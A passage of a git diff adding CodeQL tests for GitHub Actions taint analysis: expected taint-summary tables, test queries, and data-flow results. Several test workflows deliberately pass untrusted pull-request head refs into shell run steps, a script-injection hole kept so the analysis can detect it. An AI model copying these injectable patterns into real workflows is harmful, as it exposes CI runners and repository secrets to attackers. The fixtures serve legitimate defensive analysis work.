input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| dsfx3d/action-extract-unique-matches | * | input.text | output.matches | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kaisugi/action-regex-match | * | input.text | output.* | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| paulschuberth/regex-extract-action | * | input.haystack | output.matches | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| release-kit/regex | * | input.string | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zentered/issue-forms-body-parser | * | input.body | output.data | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE=$(ls \| grep -E "*.(tar.gz\|zip)$") | +isBashParameterExpansion +| parameter1 | | | +| parameter2 | | | +| parameter3 | ! | | +| parameter4 | # | | +| parameter5 | :- | value | +| parameter6 | : | =value | +| parameter7 | :+ | value | +| parameter8 | : | ?value | +| parameter9 | : | =default value | +| parameter10 | ## | */ | +| parameter11 | /# | pattern/string | +| parameter12 | /% | pattern/string | +| parameter13 | , | pattern | +| parameter14 | ,, | pattern | +| parameter15 | ^ | pattern | +| parameter16 | ^^ | pattern | +| parameter17 | : | start | +| parameter18 | # | pattern | +| parameter19 | ## | pattern | +| parameter20 | % | pattern | +| parameter21 | %% | pattern | +| parameter22 | / | pattern/string | +| parameter23 | // | pattern/string | diff --git a/actions/ql/test/library-tests/test.ql b/actions/ql/test/library-tests/test.ql new file mode 100644 index 000000000000..e4c1d9e443d0 --- /dev/null +++ b/actions/ql/test/library-tests/test.ql @@ -0,0 +1,100 @@ +import codeql.actions.Ast +import codeql.actions.Helper +import codeql.actions.Cfg as Cfg +import codeql.actions.DataFlow +import codeql.Locations +import codeql.actions.dataflow.ExternalFlow + +query predicate files(File f) { any() } + +query predicate workflows(Workflow w) { any() } + +query predicate reusableWorkflows(ReusableWorkflow w) { any() } + +query predicate compositeActions(CompositeAction w) { any() } + +query predicate jobs(Job s) { any() } + +query predicate localJobs(LocalJob s) { any() } + +query predicate extJobs(ExternalJob s) { any() } + +query predicate steps(Step s) { any() } + +query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() } + +query predicate uses(Uses s) { any() } + +query predicate stepUses(UsesStep s) { any() } + +query predicate usesArgs(Uses call, string argname, Expression arg) { + call.getArgumentExpr(argname) = arg +} + +query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } + +query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } + +query predicate cfgNodes(Cfg::Node n) { any() } + +query predicate dfNodes(DataFlow::Node e) { any() } + +query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } + +query predicate usesIds(UsesStep s, string a) { s.getId() = a } + +query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } + +query predicate scopes(Cfg::CfgScope c) { any() } + +query predicate sources(string action, string version, string output, string kind, string provenance) { + actionsSourceModel(action, version, output, kind, provenance) +} + +query predicate summaries( + string action, string version, string input, string output, string kind, string provenance +) { + actionsSummaryModel(action, version, input, output, kind, provenance) +} + +query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } + +query string testNormalizeExpr(string s) { + s = + [ + "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]", + "github.event.pull_request['user']['login']", "foo['bar'] == baz" + ] and + result = normalizeExpr(s) +} + +query predicate writeToGitHubEnv1(string content) { + exists(string t | + t = + [ + "FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR" + //"FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR", + //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", + ] and + //linesFileWrite(t, _, "$GITHUB_ENV", content, _) + Bash::blockFileWrite(t, _, "$GITHUB_ENV", content, _) + //extractFileWrite(t, "GITHUB_ENV", content) + ) +} + +query predicate isBashParameterExpansion(string parameter, string operator, string params) { + exists(string test | + test = + [ + "$parameter1", "${parameter2}", "${!parameter3}", "${#parameter4}", "${parameter5:-value}", + "${parameter6:=value}", "${parameter7:+value}", "${parameter8:?value}", + "${parameter9:=default value}", "${parameter10##*/}", "${parameter11/#pattern/string}", + "${parameter12/%pattern/string}", "${parameter13,pattern}", "${parameter14,,pattern}", + "${parameter15^pattern}", "${parameter16^^pattern}", "${parameter17:start}", + "${parameter18#pattern}", "${parameter19##pattern}", "${parameter20%pattern}", + "${parameter21%%pattern}", "${parameter22/pattern/string}", + "${parameter23//pattern/string}", + ] and + Bash::isParameterExpansion(test, parameter, operator, params) + ) +} diff --git a/actions/ql/test/library-tests/workflowenum.expected b/actions/ql/test/library-tests/workflowenum.expected new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/actions/ql/test/library-tests/workflowenum.ql b/actions/ql/test/library-tests/workflowenum.ql new file mode 100644 index 000000000000..3e0fe866ad3e --- /dev/null +++ b/actions/ql/test/library-tests/workflowenum.ql @@ -0,0 +1,7 @@ +import actions +import codeql.actions.config.ConfigExtensions as Extensions + +from + string path, string trigger, string job, string secrets_source, string permissions, string runner +where Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +select trigger, path, job, secrets_source, permissions, runner diff --git a/actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml b/actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml new file mode 100644 index 000000000000..cc3f3c2863cb --- /dev/null +++ b/actions/ql/test/query-tests/Models/.github/workflows/calling_composite.yml @@ -0,0 +1,15 @@ +on: [push] + +jobs: + hello_world_job: + runs-on: ubuntu-latest + name: A job to say hello + steps: + - uses: actions/checkout@v4 + - id: foo + uses: some-org/test-action@v1 + with: + who-to-greet: ${{ github.event.pull_request.head.ref }} + - run: echo ${{ steps.foo.outputs.reflected}} + - run: echo ${{ steps.foo.outputs.tainted}} + diff --git a/actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml new file mode 100644 index 000000000000..239ea7ab3878 --- /dev/null +++ b/actions/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml @@ -0,0 +1,47 @@ +name: Call a reusable workflow and use its outputs + +on: + workflow_dispatch: + +jobs: + call1: + uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 + with: + config-path: ${{ github.event.pull_request.head.ref }} + call2: + uses: ./.github/workflows/reusable_workflow.yml + with: + config-path: ${{ github.event.pull_request.head.ref }} + call3: + uses: octo-org/summary-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + call4: + uses: octo-org/source-repo/.github/workflows/workflow.yml@v1 + call5: + uses: octo-org/sink-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + + job1: + runs-on: ubuntu-latest + needs: call1 + steps: + - run: echo ${{ needs.call1.outputs.workflow-output }} + job2: + runs-on: ubuntu-latest + needs: call2 + steps: + - run: echo ${{ needs.call2.outputs.workflow-output1 }} + - run: echo ${{ needs.call2.outputs.workflow-output2 }} + job3: + runs-on: ubuntu-latest + needs: call3 + steps: + - run: echo ${{ needs.call3.outputs.workflow-output }} + job4: + runs-on: ubuntu-latest + needs: call4 + steps: + - run: echo ${{ needs.call4.outputs.workflow-output }} + diff --git a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml new file mode 100644 index 000000000000..c2e9e17160d3 --- /dev/null +++ b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml @@ -0,0 +1,34 @@ +name: Reusable workflow example + +on: + workflow_call: + inputs: + config-path: + required: true + type: string + outputs: + workflow-output1: + value: ${{ jobs.job1.outputs.job-output1 }} + workflow-output2: + value: ${{ jobs.job1.outputs.job-output2 }} + secrets: + token: + required: true + +jobs: + job1: + runs-on: ubuntu-latest + outputs: + job-output1: ${{ steps.step1.outputs.step-output}} + job-output2: ${{ steps.step2.outputs.all_changed_files}} + steps: + - id: step1 + env: + CONFIG_PATH: ${{ inputs.config-path }} + run: | + echo ${{ inputs.config-path }} + echo "::set-output name=step-output::$CONFIG_PATH" + - name: Get changed files + id: step2 + uses: tj-actions/changed-files@v40 + diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected new file mode 100644 index 000000000000..0a5bfe433e91 --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected @@ -0,0 +1,15 @@ +edges +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | +nodes +| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +subpaths +#select +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref new file mode 100644 index 000000000000..e5cb225ed249 --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -0,0 +1 @@ +Models/CompositeActionsSinks.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected new file mode 100644 index 000000000000..3be74bb8bf12 --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -0,0 +1,21 @@ +edges +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | +nodes +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +subpaths +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref new file mode 100644 index 000000000000..3b833d669125 --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -0,0 +1,2 @@ +Models/CompositeActionsSources.ql + diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected new file mode 100644 index 000000000000..067edb68bb1c --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected @@ -0,0 +1,12 @@ +edges +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | +nodes +| action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +subpaths +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref new file mode 100644 index 000000000000..ea9b7a304e6b --- /dev/null +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -0,0 +1,2 @@ +Models/CompositeActionsSummaries.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected new file mode 100644 index 000000000000..18e9f0186dfd --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected @@ -0,0 +1,24 @@ +edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | +nodes +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | semmle.label | Job: call2 [workflow-output1] | +| .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | semmle.label | needs.call2.outputs.workflow-output1 | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | semmle.label | output Job outputs node [workflow-output1] | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | +subpaths +#select +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref new file mode 100644 index 000000000000..fa8344d4bf91 --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -0,0 +1,2 @@ +Models/ReusableWorkflowsSinks.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected new file mode 100644 index 000000000000..c76034f74d46 --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected @@ -0,0 +1,12 @@ +edges +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | +nodes +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | +subpaths +#select +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref new file mode 100644 index 000000000000..fe4299bdba49 --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -0,0 +1,2 @@ +Models/ReusableWorkflowsSources.ql + diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected new file mode 100644 index 000000000000..8589d82d8259 --- /dev/null +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected @@ -0,0 +1,16 @@ +edges +| 